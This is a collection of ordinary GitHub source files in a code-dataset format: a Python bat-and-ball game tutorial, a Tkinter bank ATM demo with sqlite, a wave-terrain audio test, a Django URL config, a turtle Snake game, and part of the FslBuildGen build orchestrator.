for the game\ndef windowDimensions():\n return(1280,768)\n\n# define the frame rate of the game, the bigger the value the faster the game will be\ndef frameRate():\n return 20\n\n# init() is a procedure that initializes the program state and loads any sound and/or image files. init() must declare as global all the variables it sets\ndef init():\n global BALL,BAT,BALL_IMG,BAT_IMG,BALL_POS, BAT_POS,BAT_SPEED,BALL_SPEED,RED, WALL,GAME_STATUS,SCORE\n # define the color red\n RED = (255,0,0)\n\n # load the bat in the sub_folder in \"media\". The bat is a 80*12 image file\n BAT_IMG = loadImageFile(\"bat.png\")\n # define the initial position of the bar. \n BAT_POS = (-40,-200)\n # define the speed of the bat. Whenever the player move the bat, the position of the bat is based on the speed of the bar and its previous position\n BAT_SPEED = 20\n BAT = fileImg(BAT_IMG,BAT_POS)\n\n # load the ball image, which is 17 * 17 pixel\n BALL_IMG =loadImageFile(\"ball.png\")\n # define the initial position of the ball. 
The ball is placed 1 pixel above the top of the bat\n BALL_POS = (0,-200+17+1)\n # define the speed of the ball, the 1st coordinate is x speed and 2nd is y speed\n BALL_SPEED = (7,7)\n BALL = fileImg(BALL_IMG,BALL_POS)\n\n # Draw the wall using segments\n WALL = wall();\n\n GAME_STATUS = \"init\"\n # play the background music infinitly\n #playBackGroundMusic(\"house_lo.wav\")\n SCORE = 0\n\n# wall() is a list of segments [left,top,right,bottom] in red, which are the left, top, right and bottom segment of the wall respetively\ndef wall():\n lt = (-400,300)\n rt = (400,300)\n lb = (-400,-300)\n rb = (400,-300)\n left = seg(lt,lb,RED)\n top = seg(lt,rt,RED)\n right = seg(rt,rb,RED)\n bottom = seg(lb,rb,RED)\n return [left,top,right,bottom]\n\n# takes no parameters and returns a sprite consisting of the images to be displayed in the current frame. Display may read the global variables from init and update.\ndef display():\n if GAME_STATUS==\"over\":\n return gameOverImg() + staticImage()\n return [BALL,BAT] + staticImage()\n\n# update() is a procedure that updates the game state variables. update() must declare as global the variables it changes.\ndef update():\n global BALL, BAT, BALL_POS,BALL_SPEED,BALL_IMG,BAT_POS, GAME_STATUS,SCORE\n\n # update game over\n if clicked():\n playSound(CLICK)\n init()\n GAME_STATUS = \"play\"\n if gameOver():\n GAME_STATUS =\"over\"\n # reset ball position\n BALL_POS = (0,-200+17+1)\n playSound(BOING)\n return\n if GAME_STATUS==\"over\":\n return\n if GAME_STATUS ==\"init\" and not clicked():\n return\n\n pos_x,pos_y = BALL_POS\n speed_x, speed_y = BALL_SPEED\n\n # check if the ball hits the left or right boundary of the wall\n if pos_x >400-17 or pos_x < -400+3:\n # reverse the x speed\n speed_x = -speed_x\n playSound(BANG)\n # check if the ball hits the top or bottom boundary of the wall\n if pos_y > 300-4 or pos_y <-300+17:\n #reverse the y speed\n speed_y = -speed_y\n playSound(BANG)\n # bounce the wall and update speed\n BALL_SPEED = speed_x,speed_y\n\n # update bat\n bat_pos_x, bat_pos_y = BAT_POS\n # if \"d\" is down then move the bat to the right\n if K_d in keysDown:\n bat_pos_x += BAT_SPEED\n # if \"a\" is down then move the bat to the left\n if K_a in keysDown:\n bat_pos_x -=BAT_SPEED\n # prevent the bat from moving throught the wall when it hits the right of the wall\n if bat_pos_x >=400-80:\n bat_pos_x = 400-80\n # prevent the bat from moving throught the wall when it hits the left of the wall\n if bat_pos_x <=-400:\n bat_pos_x = -400\n # update bat position\n BAT_POS = bat_pos_x,bat_pos_y\n BAT = fileImg(BAT_IMG,BAT_POS)\n\n # if the ball collides with the bat then bounce the ball and update the ball speed and postion\n # whenever the ball hits the bat, both x speed and y speed increase by 2 and play the collission sound DING\n if isCollided():\n SCORE+=1\n # reverse y speed\n speed_y = -speed_y\n # increase x speed by 2\n if speed_x >0:\n speed_x+=2\n else:\n speed_x-=2\n # increase y speed by 2\n if speed_y>0:\n speed_y+=2\n else:\n speed_y-=2\n\n playSound(DING)\n BALL_SPEED = speed_x,speed_y\n\n # bounce and update ball position\n pos_x += BALL_SPEED[0]\n pos_y += BALL_SPEED[1]\n # update ball position\n BALL_POS = (pos_x,pos_y)\n BALL = fileImg(BALL_IMG,BALL_POS)\n\n\n# isCollided() iff the ball collides with the bat in the current game\ndef isCollided():\n return BAT_POS[1]-12<BALL_POS[1]<BAT_POS[1] + 17 and BAT_POS[0]-17<BALL_POS[0]<BAT_POS[0]+80\n\n# gameOver() iff the ball is below the bat\ndef gameOver():\n return BALL_POS[1] < 
BAT_POS[1]-24\n\ndef gameOverImg():\n message = txt(\"GAME OVER\",(0,0),50,RED)\n return [message]\n\n# clicked() iff the mouse is in the start button area and the left button of the mouse is pressed\ndef clicked():\n return -550<mouseX<-450 and 0<mouseY<50 and mouseDown and not oldMouseDown\n\n# display the start button. The rectangle button consists of two filled triangles and a message inside the rectangle\ndef startButton():\n # left top point of the rectangle\n lt = (-550,0)\n # right top point of the rectangle\n rt = (-450,0)\n # left bottom point of the rectangle\n lb = (-550,50)\n # right bottom point of the rectangle\n rb = (-450,50)\n # upper filled triangle in red\n t1 = ftri(lt,rt,rb,RED)\n # bottom filled triangle in red\n t2 = ftri(lt,lb,rb,RED)\n black = (0,0,0)\n text = \"Start\"\n if GAME_STATUS ==\"over\":\n text =\"Restart\"\n message = txt(text,(-500,25),30,black)\n return [t1,t2,message]\n\n# display the message of how to play the game\ndef howToPlay():\n blue = (0,0,255)\n start = txt(\"click 'Start' button on the right to start the game\",(0,375),20,blue)\n move_left = txt(\"press or hold down 'a' on the keyboard to move the bat to the left\",(0,355),20,blue)\n move_right = txt (\"press or hold down 'd' on the keyboard to move the bat to the right\",(0,335),20,blue)\n return [start,move_left,move_right]\n\n# display the wall boundary, start button and the message of how to play the game\ndef staticImage():\n return wall() + startButton() + howToPlay() + score()\n\n# display score in the current game\ndef score():\n orange = (255,128,0)\n green = (0,255,0)\n center = (-450,-100)\n # define a green circle in green, whose center is (-450,-100)\n circle = circ(center,30,green)\n # the value representing the score inthe current game\n value = txt(str(SCORE),center,30,orange)\n \n score = txt(\"Score:\",(-525,-100),30,orange)\n return [score,circle,value]\n","repo_name":"qianji/Easel_PY","sub_path":"tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"27526437170","text":"#Bank ATM\r\n#created by github.com/rajatbhatia1998\r\n#Account Number : 10 ------------ Password : trial\r\n\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nimport sqlite3\r\n\r\n\r\nARIAL = (\"arial\",10,\"bold\")\r\n\r\nclass Bank:\r\n def __init__(self,root):\r\n self.conn = sqlite3.connect(\"atm_databse.db\", timeout=100)\r\n self.login = False\r\n self.root = root\r\n self.header = Label(self.root,text=\"R~R BANK\",bg=\"#50A8B0\",fg=\"white\",font=(\"arial\",20,\"bold\"))\r\n self.header.pack(fill=X)\r\n self.frame = Frame(self.root,bg=\"#728B8E\",width=600,height=400)\r\n #Login Page Form Components\r\n self.userlabel =Label(self.frame,text=\"Account Number\",bg=\"#728B8E\",fg=\"white\",font=ARIAL)\r\n self.uentry = Entry(self.frame,bg=\"honeydew\",highlightcolor=\"#50A8B0\",\r\n highlightthickness=2,\r\n highlightbackground=\"white\")\r\n self.plabel = Label(self.frame, text=\"Password\",bg=\"#728B8E\",fg=\"white\",font=ARIAL)\r\n self.pentry = Entry(self.frame,bg=\"honeydew\",show=\"*\",highlightcolor=\"#50A8B0\",\r\n highlightthickness=2,\r\n highlightbackground=\"white\")\r\n self.button = Button(self.frame,text=\"LOGIN\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command=self.verify)\r\n self.q = Button(self.frame,text=\"Quit\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command = self.root.destroy)\r\n 
self.userlabel.place(x=145,y=100,width=120,height=20)\r\n self.uentry.place(x=153,y=130,width=200,height=20)\r\n self.plabel.place(x=125,y=160,width=120,height=20)\r\n self.pentry.place(x=153,y=190,width=200,height=20)\r\n self.button.place(x=155,y=230,width=120,height=20)\r\n self.q.place(x=480,y=360,width=120,height=20)\r\n\r\n\r\n self.frame.pack()\r\n def database_fetch(self):#Fetching Account data from database\r\n self.acc_list = []\r\n self.temp = self.conn.execute(\"select name,pass,acc_no,acc_type,bal from atm where acc_no = ? \",(self.ac,))\r\n for i in self.temp:\r\n self.acc_list.append(\"Name = {}\".format(i[0]))\r\n self.acc_list.append(\"Account no = {}\".format(i[2]))\r\n self.acc_list.append(\"Account type = {}\".format(i[3]))\r\n self.ac = i[2]\r\n self.acc_list.append(\"Balance = {}\".format(i[4]))\r\n\r\n def verify(self):#verifying of authorised user\r\n ac = False\r\n self.temp = self.conn.execute(\"select name,pass,acc_no,acc_type,bal from atm where acc_no = ? \", (int(self.uentry.get()),))\r\n for i in self.temp:\r\n self.ac = i[2]\r\n if i[2] == self.uentry.get():\r\n ac = True\r\n elif i[1] == self.pentry.get():\r\n ac = True\r\n m = \"{} Login SucessFull\".format(i[0])\r\n self.database_fetch()\r\n messagebox._show(\"Login Info\", m)\r\n self.frame.destroy()\r\n self.MainMenu()\r\n else:\r\n ac = True\r\n m = \" Login UnSucessFull ! Wrong Password\"\r\n messagebox._show(\"Login Info!\", m)\r\n\r\n if not ac:\r\n m = \" Wrong Acoount Number !\"\r\n messagebox._show(\"Login Info!\", m)\r\n\r\n\r\n def MainMenu(self):#Main App Appears after logined !\r\n self.frame = Frame(self.root,bg=\"#728B8E\",width=800,height=400)\r\n root.geometry(\"800x400\")\r\n self.detail = Button(self.frame,text=\"Account Details\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command=self.account_detail)\r\n self.enquiry = Button(self.frame, text=\"Balance Enquiry\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command= self.Balance)\r\n self.deposit = Button(self.frame, text=\"Deposit Money\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command=self.deposit_money)\r\n self.withdrawl = Button(self.frame, text=\"Withdrawl Money\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL,command=self.withdrawl_money)\r\n self.q = Button(self.frame, text=\"Quit\", bg=\"#50A8B0\", fg=\"white\", font=ARIAL, command=self.root.destroy)\r\n self.detail.place(x=0,y=0,width=200,height=50)\r\n self.enquiry.place(x=0, y=315, width=200, height=50)\r\n self.deposit.place(x=600, y=0, width=200, height=50)\r\n self.withdrawl.place(x=600, y=315, width=200, height=50)\r\n self.q.place(x=340, y=340, width=120, height=20)\r\n self.frame.pack()\r\n\r\n def account_detail(self):\r\n self.database_fetch()\r\n text = self.acc_list[0]+\"\\n\"+self.acc_list[1]+\"\\n\"+self.acc_list[2]\r\n self.label = Label(self.frame,text=text,font=ARIAL)\r\n self.label.place(x=200,y=100,width=300,height=100)\r\n\r\n def Balance(self):\r\n self.database_fetch()\r\n self.label = Label(self.frame, text=self.acc_list[3],font=ARIAL)\r\n self.label.place(x=200, y=100, width=300, height=100)\r\n\r\n def deposit_money(self):\r\n self.money_box = Entry(self.frame,bg=\"honeydew\",highlightcolor=\"#50A8B0\",\r\n highlightthickness=2,\r\n highlightbackground=\"white\")\r\n self.submitButton = Button(self.frame,text=\"Submit\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL)\r\n\r\n self.money_box.place(x=200,y=100,width=200,height=20)\r\n self.submitButton.place(x=445,y=100,width=55,height=20)\r\n self.submitButton.bind(\"<Button-1>\",self.deposit_trans)\r\n\r\n def 
deposit_trans(self,flag):\r\n self.label = Label(self.frame, text=\"Transaction Completed !\", font=ARIAL)\r\n self.label.place(x=200, y=100, width=300, height=100)\r\n self.conn.execute(\"update atm set bal = bal + ? where acc_no = ?\",(self.money_box.get(),self.ac))\r\n self.conn.commit()\r\n\r\n def withdrawl_money(self):\r\n self.money_box = Entry(self.frame,bg=\"honeydew\",highlightcolor=\"#50A8B0\",\r\n highlightthickness=2,\r\n highlightbackground=\"white\")\r\n self.submitButton = Button(self.frame,text=\"Submit\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL)\r\n\r\n self.money_box.place(x=200,y=100,width=200,height=20)\r\n self.submitButton.place(x=445,y=100,width=55,height=20)\r\n self.submitButton.bind(\"<Button-1>\",self.withdrawl_trans)\r\n\r\n def withdrawl_trans(self,flag):\r\n self.label = Label(self.frame, text=\"Money Withdrawl !\", font=ARIAL)\r\n self.label.place(x=200, y=100, width=300, height=100)\r\n self.conn.execute(\"update atm set bal = bal - ? where acc_no = ?\",(self.money_box.get(),self.ac))\r\n self.conn.commit()\r\n\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"Sign In\")\r\nroot.geometry(\"600x420\")\r\nicon = PhotoImage(file=\"icon.png\")\r\nroot.tk.call(\"wm\",'iconphoto',root._w,icon)\r\nobj = Bank(root)\r\nroot.mainloop()\r\n\r\n'''If you like this project give a star ,,,,,,Thanks !'''\r\n","repo_name":"rajatbhatia1998/Banking_Project-ATM-","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"37330265820","text":"# import section\nfrom wave_terrain import WaveTerrainSynthesis\nfrom orbits import OrbitTypes, Orbit\nfrom envelopes import EnvelopeTypes, Envelope\nfrom terrain import Terrain\nimport numpy as np\nimport soundfile as sf\n\n# main scripts\nWIDTH, HEIGHT = 512, 512\nDUR = 2\nSR = 44100\nSAMPLE_DUR = int(DUR * SR)\n\nENVELOPE_DUR = 0.1\n\nFREQX = 9000\nFREQY = 125\n\nHAPTIC_FREQ = 3\n\n# main function\ndef main() -> None:\n terrain = Terrain(size=(WIDTH, HEIGHT), xy_incr=(0.01, 0.01))\n \n envelope = Envelope(\n envelope_type=EnvelopeTypes.ADSR, \n dur=ENVELOPE_DUR,\n sr=SR,\n atk=0.001, \n decay=0, \n release=ENVELOPE_DUR - 0.001, \n sustain_amp=1.0, \n initial_amp=0.0001, \n end_amp=0.0001, \n mode=\"exp\"\n )\n \n # envelope.show_env()\n # return \n \n orbit = Orbit(orbit_type=OrbitTypes.SPIRAL, center=(0.5, 0.5))\n orbit.envelope = envelope\n \n # orbit.show_orbit(period=1 / SR)\n \n wt = WaveTerrainSynthesis(sr=SR)\n wt.terrain = terrain\n wt.orbit = orbit\n \n y = np.zeros(SAMPLE_DUR, dtype=np.float64)\n for i in range(SAMPLE_DUR):\n sample = wt.get_sample(freqs=(FREQX, FREQY), haptic_freq=HAPTIC_FREQ, max_r=0.707)\n y[i] = sample\n \n # master envelope\n y *= np.hanning(SAMPLE_DUR)\n \n sf.write(\"wt.wav\", y, SR, \"PCM_16\")\n\n\n# [MAIN PROGRAM]: if the module is being run as the main program, it calls the \"main()\" function\nif __name__ == \"__main__\":\n main()","repo_name":"PasqualeMainolfi/WT","sub_path":"WT/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32642133912","text":"from django.urls import path\nfrom .views import RubricView, newRubricView, DeleteRubricView, RubricCopyView\n\nfrom . 
import views\n\napp_name = 'rubrics'\nurlpatterns = [\n path('new', newRubricView, name='new'),\n path('<int:rubric_id>', RubricView.as_view(), name='view'),\n path('<int:pk>/delete', DeleteRubricView.as_view(), name='delete'),\n path('<int:rubric_id>/<int:eval_id>/copy', RubricCopyView.as_view(), name='copy')\n]","repo_name":"DCC-CC4401/2019-1-BC-ML-007-T4","sub_path":"src/rubrics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19252578120","text":"from turtle import Screen\n\nfrom scoreboard import Scoreboard\nfrom snake import Snake\nfrom food import Food\nimport time\n\nWIDTH = 600\nHEIGHT = 600\nSNAKE_SPEED = 0.1\nFOOD_SCORE = 10\n\nscreen = Screen()\nscreen.setup(width=WIDTH, height=HEIGHT)\nscreen.bgcolor(\"black\")\nscreen.title(\"Snake\")\nscreen.tracer(0)\n\nplaying = True\nsnake = Snake()\nfood = Food()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(snake.up, \"Up\")\nscreen.onkey(snake.down, \"Down\")\nscreen.onkey(snake.left, \"Left\")\nscreen.onkey(snake.right, \"Right\")\n\nwhile playing:\n time.sleep(SNAKE_SPEED)\n snake.move()\n screen.update()\n\n # Detect food collision\n if snake.head.distance(food) <= 15:\n print(\"Om nom nom\")\n food.respawn()\n snake.grow()\n scoreboard.add_score(FOOD_SCORE)\n\n # Detect wall collision\n if snake.head.xcor() > 280 or snake.head.xcor() < -280 or snake.head.ycor() > 280 or snake.head.ycor() < -280:\n playing = False\n\n # Detect tail collision\n # If head collides with any segment in the tail:\n for segment in snake.segments[1:]:\n if snake.head.distance(segment) < 10: \n playing = False\n\nscoreboard.game_over()\n\nscreen.exitonclick()\n","repo_name":"tysongf/100-days-of-python","sub_path":"projects/20/snake_game.py","file_name":"snake_game.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12987570905","text":"from typing import Any\nfrom typing import Callable\nfrom typing import cast\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\nimport os\nimport multiprocessing\nimport shlex\nimport sys\nimport subprocess\nfrom FslBuildGen import IOUtil\nfrom FslBuildGen import PackageUtil\nfrom FslBuildGen import PackageListUtil\nfrom FslBuildGen import PlatformUtil\nfrom FslBuildGen.BasicConfig import BasicConfig\nfrom FslBuildGen.Build.BuildConfigRecord import BuildConfigRecord\nfrom FslBuildGen.Build.BuildUtil import PlatformBuildUtil\nfrom FslBuildGen.Build.DataTypes import CommandType\nfrom FslBuildGen.Build.Filter import PackageFilter\nfrom FslBuildGen.Build.Filter import RequirementFilter\nfrom FslBuildGen.Build.RequirementTree import RequirementTree\nfrom FslBuildGen.Build.RequirementTreeNode import RequirementTreeNode\nfrom FslBuildGen.BuildConfig import Validate\nfrom FslBuildGen.BuildContent import ContentBuilder\nfrom FslBuildGen.BuildContent.SharedValues import CONFIG_FSLBUILDCONTENT_ENABLED\nfrom FslBuildGen.BuildExternal import RecipeBuilder\nfrom FslBuildGen.BuildExternal.BuilderSettings import BuilderSettings\nfrom FslBuildGen.Config import Config\nfrom FslBuildGen.Context.GeneratorContext import GeneratorContext\nfrom FslBuildGen.DataTypes import BuildThreads\nfrom FslBuildGen.DataTypes import BuildVariantConfig\nfrom FslBuildGen.DataTypes import BuildVariantType\nfrom FslBuildGen.DataTypes import 
PackageCreationYearString\nfrom FslBuildGen.DataTypes import PackageRequirementTypeString\nfrom FslBuildGen.DataTypes import PackageType\nfrom FslBuildGen.DataTypes import VariantType\nfrom FslBuildGen.ExtensionListManager import ExtensionListManager\nfrom FslBuildGen.Generator import PluginConfig\nfrom FslBuildGen.Generator.GeneratorPluginBase2 import GeneratorPluginBase2\nfrom FslBuildGen.Generator.GeneratorVC import GeneratorVCUtil\nfrom FslBuildGen.Generator.Report.ReportVariableFormatter import ReportVariableFormatter\nfrom FslBuildGen.Generator.VariantHelper import VariantHelper\nfrom FslBuildGen.PackageConfig import PlatformNameString\nfrom FslBuildGen.Generator.Report.PackageGeneratorReport import PackageGeneratorReport\nfrom FslBuildGen.Packages.Package import Package\nfrom FslBuildGen.Packages.Package import PackagePlatformVariant\nfrom FslBuildGen.Packages.PackageRequirement import PackageRequirement\nfrom FslBuildGen.PackageFilters import PackageFilters\nfrom FslBuildGen.Log import Log\nfrom FslBuildGen.SharedGeneration import GEN_BUILD_ENV_VARIANT_SETTING\nfrom FslBuildGen.SharedGeneration import ToolAddedVariant\nfrom FslBuildGen.Xml.XmlStuff import XmlGenFileVariantOption\n\n\nclass LocalPlatformBuildContext(object):\n def __init__(self, log: Log, generatorOriginalName: str, buildCommand: int, buildThreads: int) -> None:\n self.Log = log\n self.AdditionalBuildArguments = [] # type: List[str]\n PlatformBuildUtil.AddBuildThreads(log, self.AdditionalBuildArguments, generatorOriginalName, buildThreads)\n if buildCommand == CommandType.Clean:\n self.__HandleCleanBuilds(self.AdditionalBuildArguments, generatorOriginalName)\n\n\n def __HandleCleanBuilds(self, rArgumentList: List[str], generatorOriginalName: str) -> None:\n platformName = generatorOriginalName\n if platformName == PlatformNameString.QNX or platformName == PlatformNameString.YOCTO or platformName == PlatformNameString.UBUNTU:\n rArgumentList += ['clean']\n elif platformName == PlatformNameString.WINDOWS:\n rArgumentList += ['/t:Clean']\n else:\n self.Log.LogPrintWarning(\"The builder ignored --Command: clean\")\n\n\nclass LocalBuildContext(object):\n def __init__(self, config: Config, platformBuildContext: LocalPlatformBuildContext,\n generatorReportDict: Dict[Package, PackageGeneratorReport],\n generatorName: str) -> None:\n self.Config = config\n self.Platform = platformBuildContext\n self.GeneratorReportDict = generatorReportDict\n self.GeneratorName = generatorName\n\n\nBuildMethodType = Callable[[LocalBuildContext, Package, BuildConfigRecord, Dict[str, str], Optional[List[str]]], None]\n\nclass Builder(object):\n # requestedPackages is the packages specifically requested by the user or None for SDK builds.\n def __init__(self, generatorContext: GeneratorContext,\n config: Config,\n topLevelPackage: Package,\n buildConfig: BuildConfigRecord,\n enableContentBuilder: bool,\n forceClaimInstallArea: bool) -> None:\n super(Builder, self).__init__()\n self.Log = config\n\n localPlatformBuildContext = LocalPlatformBuildContext(config, generatorContext.Generator.OriginalName,\n buildConfig.BuildCommand, buildConfig.BuildThreads)\n\n\n # Do a final filter that removes all unsupported packages\n resolvedBuildOrder = topLevelPackage.ResolvedBuildOrder\n resolvedBuildOrder = PackageFilter.FilterNotSupported(self.Log, topLevelPackage, resolvedBuildOrder)\n if not PackageFilter.WasThisAExecutableBuildAndAreThereAnyLeft(topLevelPackage.ResolvedBuildOrder, resolvedBuildOrder):\n self.Log.DoPrint(\"No executables left, skipping 
all\")\n return\n\n # Run the recipe builder on the packages we have left\n # We run the recipe builder on the resolvedBuildOrder since it all required packages, not just the ones we need to build as libs and executables\n builderSettings = BuilderSettings()\n builderSettings.ForceClaimInstallArea = forceClaimInstallArea\n builderSettings.BuildThreads = buildConfig.BuildThreads\n RecipeBuilder.BuildPackagesInOrder(config, generatorContext, resolvedBuildOrder, builderSettings)\n\n\n resolvedBuildOrderBuildable = PackageFilter.FilterBuildablePackages(resolvedBuildOrder)\n if len(resolvedBuildOrderBuildable) == 0:\n config.DoPrint(\"Nothing to build!\")\n return\n\n generatorReportDict = generatorContext.Generator.GenerateReport(self.Log, resolvedBuildOrderBuildable)\n\n packageCount = len(resolvedBuildOrderBuildable)\n\n resolvedBuildOrderBuildable = self.__ApplyPlatformOrderChanges(resolvedBuildOrderBuildable, buildConfig.PlatformName)\n\n originalBuildArgs = buildConfig.BuildArgs\n\n # Default content building for all platform (for those generators that don't add it to the build file)\n if enableContentBuilder:\n for package in resolvedBuildOrderBuildable:\n if package.Type == PackageType.Executable:\n featureList = [entry.Name for entry in package.ResolvedAllUsedFeatures]\n if package.AbsolutePath is None:\n raise Exception(\"Invalid package\")\n ContentBuilder.Build(config, package.AbsolutePath, featureList)\n\n # Windows runs its validation checks slightly differently\n runValidationChecks = (buildConfig.PlatformName != PlatformNameString.WINDOWS)\n\n buildContext = LocalBuildContext(config, localPlatformBuildContext, generatorReportDict, generatorContext.GeneratorName)\n for package in resolvedBuildOrderBuildable:\n config.LogPrint(\"Building package: {0}\".format(package.Name))\n config.LogPrint(\"Package location: {0}\".format(package.AbsolutePath))\n if not config.IsDryRun:\n buildEnv = os.environ.copy() # type: Dict[str, str]\n buildEnv[CONFIG_FSLBUILDCONTENT_ENABLED] = \"false\"\n self.__ExtendEnvironmentDictWithVariants(config, buildEnv, package, buildConfig.VariantSettingsDict)\n buildConfig.BuildArgs = list(originalBuildArgs)\n if config.Verbosity > 4:\n config.DoPrint(\"Package build arguments1: {0}\".format(buildConfig.BuildArgs))\n config.DoPrint(\"General build arguments2: {0}\".format(originalBuildArgs))\n strRunCommands = buildConfig.RunCommand\n runCommands = None # type: Optional[List[str]]\n if strRunCommands is not None:\n userRunCommands = shlex.split(strRunCommands)\n runCommands = self.__TryGenerateRunCommandForExecutable(buildContext, package, buildConfig.VariantSettingsDict, userRunCommands)\n if runValidationChecks:\n featureList = [entry.Name for entry in package.ResolvedAllUsedFeatures]\n Validate.ValidatePlatform(config, buildConfig.PlatformName, featureList, 4)\n self.__BuildPackage(buildContext, package, buildConfig, buildEnv, runCommands)\n\n if packageCount > 0:\n config.LogPrint(\"Build {0} packages\".format(packageCount))\n else:\n config.DoPrint(\"Nothing build!\")\n\n\n def __ApplyPlatformOrderChanges(self, resolvedBuildOrder: List[Package], platformName: str) -> List[Package]:\n if platformName != PlatformNameString.WINDOWS:\n return resolvedBuildOrder\n\n # Since visual studio does its own dependency management and building\n # we dont need to request packages to be build multiple times.\n markedForBuild = set() # type: Set[str]\n result = [] # type: List[Package]\n for package in reversed(resolvedBuildOrder):\n if not package.Name in 
markedForBuild:\n markedForBuild.add(package.Name)\n result.append(package)\n for entry in package.ResolvedAllDependencies:\n markedForBuild.add(entry.Name)\n\n return result\n\n\n def __BuildPackage(self, buildContext: LocalBuildContext,\n package: Package,\n buildConfig: BuildConfigRecord,\n buildEnv: Dict[str, str],\n runCommands: Optional[List[str]]) -> None:\n if package.AbsolutePath is None or package.ResolvedBuildPath is None:\n raise Exception(\"Invalid package\")\n if buildContext.GeneratorReportDict is None:\n raise Exception(\"Build not supported by generator '{0}' for package: {1}\".format(buildContext.GeneratorName, package.Name))\n if package not in buildContext.GeneratorReportDict:\n raise Exception(\"Build not supported by generator '{0}' for package: {1}\".format(buildContext.GeneratorName, package.Name))\n generatorReport = buildContext.GeneratorReportDict[package]\n buildReport = generatorReport.BuildReport\n variableReport = generatorReport.VariableReport\n if buildReport is None:\n raise Exception(\"Build report not supported by generator '{0}' for package: {1}\".format(buildContext.GeneratorName, package.Name))\n buildCommandReport = buildReport.BuildCommandReport\n if buildCommandReport is None:\n if self.Log.Verbosity >= 5:\n self.Log.LogPrint(\"Skipping package '{0}' as its build command was None\".format(package.Name))\n return\n\n currentWorkingDirectory = package.AbsolutePath\n if buildCommandReport.CurrentWorkingDirectoryFormatString is not None:\n currentWorkingDirectory = ReportVariableFormatter.Format(buildCommandReport.CurrentWorkingDirectoryFormatString, variableReport, buildConfig.VariantSettingsDict)\n\n buildCommandStr = ReportVariableFormatter.Format(buildCommandReport.CommandFormatString, variableReport, buildConfig.VariantSettingsDict)\n if not buildCommandReport.UseAsRelative:\n buildCommandStr = IOUtil.Join(currentWorkingDirectory, buildCommandStr)\n\n buildArgumentList = []\n for buildArgument in buildCommandReport.Arguments:\n buildArgument = ReportVariableFormatter.Format(buildArgument, variableReport, buildConfig.VariantSettingsDict)\n buildArgumentList.append(buildArgument)\n\n\n buildCommand = [buildCommandStr] + buildArgumentList + buildConfig.BuildArgs\n if len(buildContext.Platform.AdditionalBuildArguments) > 0:\n buildCommand += buildContext.Platform.AdditionalBuildArguments\n\n try:\n result = subprocess.call(buildCommand, cwd=currentWorkingDirectory, env=buildEnv)\n if result != 0:\n self.Log.LogPrintWarning(\"The build command '{0}' failed with '{1}'. It was run with CWD: '{2}'\".format(\" \".join(buildCommand), result, currentWorkingDirectory))\n sys.exit(result)\n except FileNotFoundError:\n self.Log.DoPrintWarning(\"The build command '{0}' failed with 'file not found'. It was run with CWD: '{1}'\".format(\" \".join(buildCommand), currentWorkingDirectory))\n raise\n\n if runCommands:\n try:\n # TODO: Allow the working directory for the run command to be changed too. For now use the original choice of absolute path for the package\n currentWorkingDirectory = package.AbsolutePath\n result = subprocess.call(runCommands, cwd=currentWorkingDirectory, env=buildEnv)\n if result != 0:\n self.Log.LogPrintWarning(\"The run command '{0}' failed with '{1}'. It was run with CWD: '{2}'\".format(\" \".join(runCommands), result, currentWorkingDirectory))\n sys.exit(result)\n except FileNotFoundError:\n self.Log.LogPrintWarning(\"The run command '{0}' failed with 'file not found'. 
It was run with CWD: '{1}'\".format(\" \".join(runCommands), currentWorkingDirectory))\n raise\n\n\n\n def __TryLocateVariant(self, package: Package, key: str) -> Optional[PackagePlatformVariant]:\n if key in package.ResolvedAllVariantDict:\n return package.ResolvedAllVariantDict[key]\n # try a manual search for 'virtual keys'\n for entry in list(package.ResolvedAllVariantDict.values()):\n if key in entry.PurifiedName:\n return entry\n return None\n\n\n def __ExtendEnvironmentDictWithVariants(self, config: Config,\n buildEnv: Dict[str, str],\n package: Package,\n userVariantSettingDict: Dict[str, str]) -> None:\n for key, value in list(userVariantSettingDict.items()):\n variant = self.__TryLocateVariant(package, key)\n if variant is not None:\n if variant.Type == VariantType.Virtual or (value in variant.OptionDict):\n envName = \"{0}{1}\".format(GEN_BUILD_ENV_VARIANT_SETTING, key.upper())\n if envName in buildEnv:\n raise Exception(\"The environment variable {0} has allready been defined\".format(envName))\n buildEnv[envName] = value\n else:\n validValues = list(variant.OptionDict.keys())\n validValues.sort()\n config.LogPrint(\"WARNING: Variant '%s' expects one of the following values: '%s' not '%s'\" % (key, ','.join(validValues), value))\n\n\n\n def __ExtractRelevantVariantSettingsDict(self, config: Config,\n package: Package,\n userVariantSettingDict: Dict[str, str]) -> Dict[str, str]:\n \"\"\" Filters the userVariantSettingsDict down into a dict containing only the entries that are relevant for this package.\n It also validates that the user-value is valid for the given variant.\n \"\"\"\n dictVariantSettings = {} # type: Dict[str, str]\n for key, value in userVariantSettingDict.items():\n if key in package.ResolvedAllVariantDict:\n variant = package.ResolvedAllVariantDict[key]\n if value in variant.OptionDict:\n dictVariantSettings[key] = value\n else:\n validValues = list(variant.OptionDict.keys())\n validValues.sort()\n config.DoPrintWarning(\"Variant '{0}' expects one of the following values: '{1}' not '{2}'\".format(key, ','.join(validValues), 